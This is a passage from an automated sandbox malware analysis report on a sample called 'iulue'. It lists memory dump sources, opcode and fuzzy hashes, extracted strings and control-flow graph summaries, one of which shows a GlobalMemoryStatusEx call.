                                                                                                  • Opcode Fuzzy Hash: 5d8f8c9cb5c3490ffb3724dda8f6a3777ab80f65f52a9a2de8cdf143f0ff1687
                                                                                                  • Instruction Fuzzy Hash: 42E012B4D09208EFCB44DBA9D4546ACFBB5AB89314F14C1AA9C1897381C631AA42DF88
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1955135263.0000000007060000.00000040.00000800.00020000.00000000.sdmp, Offset: 07060000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_7060000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35db99e98c0c684d676f01fe7ba8db0221773eafefe03bee9c7985300260c21f
                                                                                                  • Instruction ID: dafbeb4228b52cb707adb74c08df568ca37bcc308b4911d127c4427f80789ebf
                                                                                                  • Opcode Fuzzy Hash: 35db99e98c0c684d676f01fe7ba8db0221773eafefe03bee9c7985300260c21f
                                                                                                  • Instruction Fuzzy Hash: 8FE08CB4D09208EBCB04DB94D8405ACBBB4AB46314F1081ECC80817340C6316E03CF84
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 33ab262333bd20856c14763a9b13ecd2babb8e3c81d672231989a7f713d0b176
                                                                                                  • Instruction ID: 1da8082722503071767575b203dd30aefd27bf42355cae6803fbd243e2ee8c7b
                                                                                                  • Opcode Fuzzy Hash: 33ab262333bd20856c14763a9b13ecd2babb8e3c81d672231989a7f713d0b176
                                                                                                  • Instruction Fuzzy Hash: 22D012B0901208EF8B00DFA8F94195DBBF5DB44206B5045A9E408D7304DA315F009B61
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: b8bd4cd30cb28384ce46763b71bfe64eb96ffba4396b12eeb3061062da33e2af
                                                                                                  • Instruction ID: 00de4859689bc6aec41d43b14705544d7d6ee466a4d08393e1a697c291b6fa48
                                                                                                  • Opcode Fuzzy Hash: b8bd4cd30cb28384ce46763b71bfe64eb96ffba4396b12eeb3061062da33e2af
                                                                                                  • Instruction Fuzzy Hash: B0C02B5108D7C4CFC32323A53C2C8903F28995310078500CBE488CB4E3E9448816E363
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 1e43074088a51d5cd8d1ebc28c4956847ef7e2465c2580c4ed63f10b78c38982
                                                                                                  • Instruction ID: f52336a3d26a98ac65ca0a6e7c1db41ffb1e147c85149b1321f2cb85118f13ae
                                                                                                  • Opcode Fuzzy Hash: 1e43074088a51d5cd8d1ebc28c4956847ef7e2465c2580c4ed63f10b78c38982
                                                                                                  • Instruction Fuzzy Hash: 6BC08C0640E3C04FDB23067028B90842F70891318071A0ACBD8C0CE8ABD10C096EC323
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 62beb0be00f51739e628f988d4f2720a87042c40a34555be1cee4259d4910112
                                                                                                  • Instruction ID: 89adc77130f569cd2b32c092967605b62478c7a35d4cbb7e584bc641f107d976
                                                                                                  • Opcode Fuzzy Hash: 62beb0be00f51739e628f988d4f2720a87042c40a34555be1cee4259d4910112
                                                                                                  • Instruction Fuzzy Hash: 36C0484888E3C26EC717A23908648996F781C5300078A00CA9080DB4A3C44C880EC322
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 37814cf050bd6c11489f34ba0758613b99b1244b47578c5861f179c0cf34811c
                                                                                                  • Instruction ID: b23b01b28aa27a54e91dafeaf7121e5f6b3b66f967110433cc192e5ba003b82c
                                                                                                  • Opcode Fuzzy Hash: 37814cf050bd6c11489f34ba0758613b99b1244b47578c5861f179c0cf34811c
                                                                                                  • Instruction Fuzzy Hash: 6BC0482010EBC8DFEB139B60A966964BF306E5330030A56C29082CB1B3C61A9848EB62
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: bf2a9d6afc8170bbb327a66d27d56353e40c2f1f578c6c31c32455375727661c
                                                                                                  • Instruction ID: 7d920afb28810e947ab1913a0397a9d017f8a32dd33082c9de693d0643d7d905
                                                                                                  • Opcode Fuzzy Hash: bf2a9d6afc8170bbb327a66d27d56353e40c2f1f578c6c31c32455375727661c
                                                                                                  • Instruction Fuzzy Hash: 2EB0922084A2808ADF2217246D04B243F219F17A48F5A00D18040C66A7D1288409D722
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 65f7491215b837ba2a452ae74bcf39fbb8bed40e1ec388b27e58d318a10f6026
                                                                                                  • Instruction ID: 827d1530d0386120af733765d9e715d832e9df1d8069634c35f3cfe58fad76c3
                                                                                                  • Opcode Fuzzy Hash: 65f7491215b837ba2a452ae74bcf39fbb8bed40e1ec388b27e58d318a10f6026
                                                                                                  • Instruction Fuzzy Hash: 3690027104570C8B4550379679196557B5C95545157800051A90D816115A55A41145A5
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 9206a519e61619ad1d46db0a2d6ead2e3bca9d23982bc19fa5fdd249cff6cfca
                                                                                                  • Instruction ID: 8df6cd0dd54b4820e637d2dcfad834d06014ff425f5a3638a775ea049fbd0050
                                                                                                  • Opcode Fuzzy Hash: 9206a519e61619ad1d46db0a2d6ead2e3bca9d23982bc19fa5fdd249cff6cfca
                                                                                                  • Instruction Fuzzy Hash: F4B09230201201CE8B05CE008184870BB70FB81A0032090EAC1031E461C7208987EA02
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000004.00000002.1928334656.0000000000EF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00EF0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_4_2_ef0000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: 0.q$TJiq$jjjjjj$$dq$$dq
                                                                                                  • API String ID: 0-4277727295
                                                                                                  • Opcode ID: 1bf6c21135076003abcb51d45ea18385fd949b4fd43a25a732ad799259566305
                                                                                                  • Instruction ID: 798fffd2f20bc40751f7e2de6fe9540e73a36ec57ca657b9dcf0ebd1c1f4f9bd
                                                                                                  • Opcode Fuzzy Hash: 1bf6c21135076003abcb51d45ea18385fd949b4fd43a25a732ad799259566305
                                                                                                  • Instruction Fuzzy Hash: ECB09230201201CE8B01CE108184875B370FF81A0032490AAC1031E851C72089C7EB02

                                                                                                  Execution Graph

                                                                                                  Execution Coverage:11%
                                                                                                  Dynamic/Decrypted Code Coverage:100%
                                                                                                  Signature Coverage:0%
                                                                                                  Total number of Nodes:25
                                                                                                  Total number of Limit Nodes:6
[Execution graph 25183: node listing omitted; the only API call named in its nodes is GlobalMemoryStatusEx]

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq
                                                                                                  • API String ID: 0-2340669324
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-2331353128

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq$$dq
                                                                                                  • API String ID: 0-185584874

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq$$dq
                                                                                                  • API String ID: 0-2861643491
                                                                                                  • Opcode ID: b2c6c5eb1df1bc7f6323d9576e7d15da0603af8ffb3035b39f8997571aad3d37
                                                                                                  • Instruction ID: 809d067b081660fd04883b6dca790233e02757d845b2426d295506a7801e4627
                                                                                                  • Opcode Fuzzy Hash: b2c6c5eb1df1bc7f6323d9576e7d15da0603af8ffb3035b39f8997571aad3d37
                                                                                                  • Instruction Fuzzy Hash: 9E6231306003258FCB55FF69D990A9DB7E2FF84311B208A68E4099F359DB71ED46CB90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fiq$XPiq$\Oiq
                                                                                                  • API String ID: 0-1639307521
                                                                                                  • Opcode ID: 02b9931c881759b6e2aedeaabeb694c3ff6b2b165353e7e5c3415ff399ffdcc0
                                                                                                  • Instruction ID: 514625fcf7ea3b54667e737593442b83be93ebad2fab50e1c8ed87f1385ed855
                                                                                                  • Opcode Fuzzy Hash: 02b9931c881759b6e2aedeaabeb694c3ff6b2b165353e7e5c3415ff399ffdcc0
                                                                                                  • Instruction Fuzzy Hash: CD617E70F002199FEB55EFA5C8547AEBBF6FF88300F208529E10AEB395DA755C458B90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq$$dq
                                                                                                  • API String ID: 0-2340669324
                                                                                                  • Opcode ID: 18d753784b048ec9a506af09c988f7d7b610a139c11ec6a0e4d80beb17b70b53
                                                                                                  • Instruction ID: ce1d7f58fb7178dc2a774ec616340c36cc17016c84e122be87b532cbb0b5c629
                                                                                                  • Opcode Fuzzy Hash: 18d753784b048ec9a506af09c988f7d7b610a139c11ec6a0e4d80beb17b70b53
                                                                                                  • Instruction Fuzzy Hash: 1F517330B012159FDB95EB75D950B6FB7FAEBC8600F108569D809EB398EE31DD028B91

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: fiq$XPiq
                                                                                                  • API String ID: 0-1767242014
                                                                                                  • Opcode ID: 56d07cda3165075c8d35b55e15e2547e60056b00676f79df23402deb569c9776
                                                                                                  • Instruction ID: 2f0b2b05cbe26f15bfe016f72efda43cd0ba6573b87950f5245b5396dbbc2548
                                                                                                  • Opcode Fuzzy Hash: 56d07cda3165075c8d35b55e15e2547e60056b00676f79df23402deb569c9776
                                                                                                  • Instruction Fuzzy Hash: 7F519F70F002189FEB55EFA5C8147AEBAF6FFC8300F208529E106AB395DA719C058B90

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1769 112eb08-112eb23 1771 112eb25-112eb4c 1769->1771 1772 112eb4d-112eb6c call 112e708 1769->1772 1777 112eb72-112ebd1 1772->1777 1778 112eb6e-112eb71 1772->1778 1785 112ebd3-112ebd6 1777->1785 1786 112ebd7-112ec64 GlobalMemoryStatusEx 1777->1786 1790 112ec66-112ec6c 1786->1790 1791 112ec6d-112ec95 1786->1791 1790->1791
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2954670095.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_1120000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e464a813dd3d72d4a8f0849187ee867e455e8bb7a5a11a15e5f74c7966acd7f2
                                                                                                  • Instruction ID: 71c261f1e7d49db09078424003e4a1cd97b96e18f563d50f5b87ec4deb1d17e5
                                                                                                  • Opcode Fuzzy Hash: e464a813dd3d72d4a8f0849187ee867e455e8bb7a5a11a15e5f74c7966acd7f2
                                                                                                  • Instruction Fuzzy Hash: 5D413471D093998FCB05DFA9D8046AEBFF1AFCA210F0885AFD545A7281DB749844CBD1

                                                                                                  Control-flow Graph

                                                                                                  • Executed
                                                                                                  • Not Executed
                                                                                                  control_flow_graph 1794 112ebf0-112ec2e 1795 112ec36-112ec64 GlobalMemoryStatusEx 1794->1795 1796 112ec66-112ec6c 1795->1796 1797 112ec6d-112ec95 1795->1797 1796->1797
                                                                                                  APIs
                                                                                                  • GlobalMemoryStatusEx.KERNELBASE ref: 0112EC57
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2954670095.0000000001120000.00000040.00000800.00020000.00000000.sdmp, Offset: 01120000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_1120000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID: GlobalMemoryStatus
                                                                                                  • String ID:
                                                                                                  • API String ID: 1890195054-0
                                                                                                  • Opcode ID: 6f266c2636173c2c48533455487c65278ab8df7999a9a5bb76aefd978e693bdb
                                                                                                  • Instruction ID: a92b95542ec2be7aade2b8872a3b0130c5150906bcfe657cfa002a8234253042
                                                                                                  • Opcode Fuzzy Hash: 6f266c2636173c2c48533455487c65278ab8df7999a9a5bb76aefd978e693bdb
                                                                                                  • Instruction Fuzzy Hash: 6A111FB1C002699BCB14DF9AC548B9EFBF4AB48320F11816AD828B7240D378A954CFA1
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHdq
                                                                                                  • API String ID: 0-2991842255
                                                                                                  • Opcode ID: 814133825ebe9ec1a226b33d5e4df81fe718c61a6ed4225322f422be2e7d7242
                                                                                                  • Instruction ID: 18cf47fa9a9d1caad760ab0b1645cc30c0bf4794b6cf105c91c29d946a0d6d22
                                                                                                  • Opcode Fuzzy Hash: 814133825ebe9ec1a226b33d5e4df81fe718c61a6ed4225322f422be2e7d7242
                                                                                                  • Instruction Fuzzy Hash: 19418170E0130A9FDB65FF75C85069EBBB2BF85300F20492AE405EB245DB75A946CB81
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHdq
                                                                                                  • API String ID: 0-2991842255
                                                                                                  • Opcode ID: 0fb6ea2275be38d78a323558f33876b7c5e0191da185e4235e0383d2d5e2d473
                                                                                                  • Instruction ID: 68f73b55f9028bdf4cfd8174b7d480b5e0842170c20c87814a129efefd13799f
                                                                                                  • Opcode Fuzzy Hash: 0fb6ea2275be38d78a323558f33876b7c5e0191da185e4235e0383d2d5e2d473
                                                                                                  • Instruction Fuzzy Hash: 8531BF30B102158FDB59BB35C96436EBBB6AFC9200F144569E406DB389EE35DD42CB90
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: PHdq
                                                                                                  • API String ID: 0-2991842255
                                                                                                  • Opcode ID: a54a66bdfeca31a28900e032f44851f770e5ce84b72b85d058547a5860a7f395
                                                                                                  • Instruction ID: 78ddad90bb043a33665b48446ccc221f247f6cb7b7e2435a4e6a2661dafdfde9
                                                                                                  • Opcode Fuzzy Hash: a54a66bdfeca31a28900e032f44851f770e5ce84b72b85d058547a5860a7f395
                                                                                                  • Instruction Fuzzy Hash: 5231D030B102158FDB59BB75C95476FBAF6AFC8200F208568E406EB388EE35DD42CB91
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $dq
                                                                                                  • API String ID: 0-847773763
                                                                                                  • Opcode ID: af0ac5269672996848fabc9d7937bc38355be269e366e97eb957da38ae3d3820
                                                                                                  • Instruction ID: 9146a217f0f85482ced133bacb3b0514adb655e6d0cc4482717f5c8e3bf175c8
                                                                                                  • Opcode Fuzzy Hash: af0ac5269672996848fabc9d7937bc38355be269e366e97eb957da38ae3d3820
                                                                                                  • Instruction Fuzzy Hash: 55F0FF31A04221CFDFA5BB46FE803ACB3B5EBC0341F104566D905CB245D739E901C780
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 18b536e6773c6ac64495545ad9e82f7bf11b6663d83fd6fead30d468b8034edf
                                                                                                  • Instruction ID: 035116291cd8bebb5f7d46c2bfc36dca02daed6fed3671e6a7143b95c500d9c9
                                                                                                  • Opcode Fuzzy Hash: 18b536e6773c6ac64495545ad9e82f7bf11b6663d83fd6fead30d468b8034edf
                                                                                                  • Instruction Fuzzy Hash: C761B071F001214FDF54AB6ECC8066FAADBAFD5220B254479E80EDB364DEA5ED4287C1
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3c95933ee7d45ebab2841506ba3572a0ceb7d817a1e5ae5df598e4a276be48ef
                                                                                                  • Instruction ID: 7260674851019c5016e3dedeab3bb6d57148192ce489f69fe796dfd1557fef2b
                                                                                                  • Opcode Fuzzy Hash: 3c95933ee7d45ebab2841506ba3572a0ceb7d817a1e5ae5df598e4a276be48ef
                                                                                                  • Instruction Fuzzy Hash: B4813E30B106099BDB55EFB9D95079EBBF6EBC9300F108529D50ADB399EA30DC428B91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 58bdcf3da0fd887ec61783b1eb6a9588ff680d6516b391eb365fd2630b26fb4a
                                                                                                  • Instruction ID: 4846eb86a452f55d9fd607b9f10f5c787f8fb6efabf609ad9e9dd4f24b95e1ba
                                                                                                  • Opcode Fuzzy Hash: 58bdcf3da0fd887ec61783b1eb6a9588ff680d6516b391eb365fd2630b26fb4a
                                                                                                  • Instruction Fuzzy Hash: D9915D30E006198FDF61DF68C850B9DBBB1FF89310F208599D549BB295DB70AA85CB91
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 43395e28ccc1199e6c41934b63e3b1a606d9cb0b5e3b669a0f1fea0fceebe475
                                                                                                  • Instruction ID: d585b8c9c21eb18e5a80b747169d464f51234a13d522bffba7794f91f0e9c907
                                                                                                  • Opcode Fuzzy Hash: 43395e28ccc1199e6c41934b63e3b1a606d9cb0b5e3b669a0f1fea0fceebe475
                                                                                                  • Instruction Fuzzy Hash: 5511CFB1D01259AFCB00DF9AD888ACEFBF4FB48310F10812AE918A7341C375A954CFA5
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 48afb9e0b5ba84d25ac3adf0f0f5aa957dcd0dfd2378f48aa860942560d870f1
                                                                                                  • Instruction ID: 7e446a31ffa3cb31beda978e5cb2a6677df0275589634e182bcaa523021d888c
                                                                                                  • Opcode Fuzzy Hash: 48afb9e0b5ba84d25ac3adf0f0f5aa957dcd0dfd2378f48aa860942560d870f1
                                                                                                  • Instruction Fuzzy Hash: 2601D630B141110FDBA5B66D985071FB2DBDBC8B11F108439F20ACB344DD65EC024384
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: f3f7ebc3cef8734e116267e2cc7ad57fffa8ad289f231db61a5bb491d0cb7224
                                                                                                  • Instruction ID: 897aacdbe750e524dc0a9df1938337b58dd01903efd9205eee386917512f32ea
                                                                                                  • Opcode Fuzzy Hash: f3f7ebc3cef8734e116267e2cc7ad57fffa8ad289f231db61a5bb491d0cb7224
                                                                                                  • Instruction Fuzzy Hash: DC018C35B141211FDBA5B62D98A5B2F72D7FBCA620F108839F24ACB344EE61DC024385
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: d2e78c7511fe4e1b80cacba41cf649b1aa8c2a541ad6fa13f553687c0eeb01e4
                                                                                                  • Instruction ID: cc912c24244dd72c75e6764730bd881eeb9700c601740c34e677b059e9f71699
                                                                                                  • Opcode Fuzzy Hash: d2e78c7511fe4e1b80cacba41cf649b1aa8c2a541ad6fa13f553687c0eeb01e4
                                                                                                  • Instruction Fuzzy Hash: 5D013135B105254FDBA5FB6DD96071FB3D6D789720F108928F60ACB358EE21EC428785
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2969747326.0000000006A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 06A40000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_6a40000_iulue.jbxd
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 35362582afb25bdbb09b1280a95f8a68633667d5fdcdd3202e28545ed4c7127c
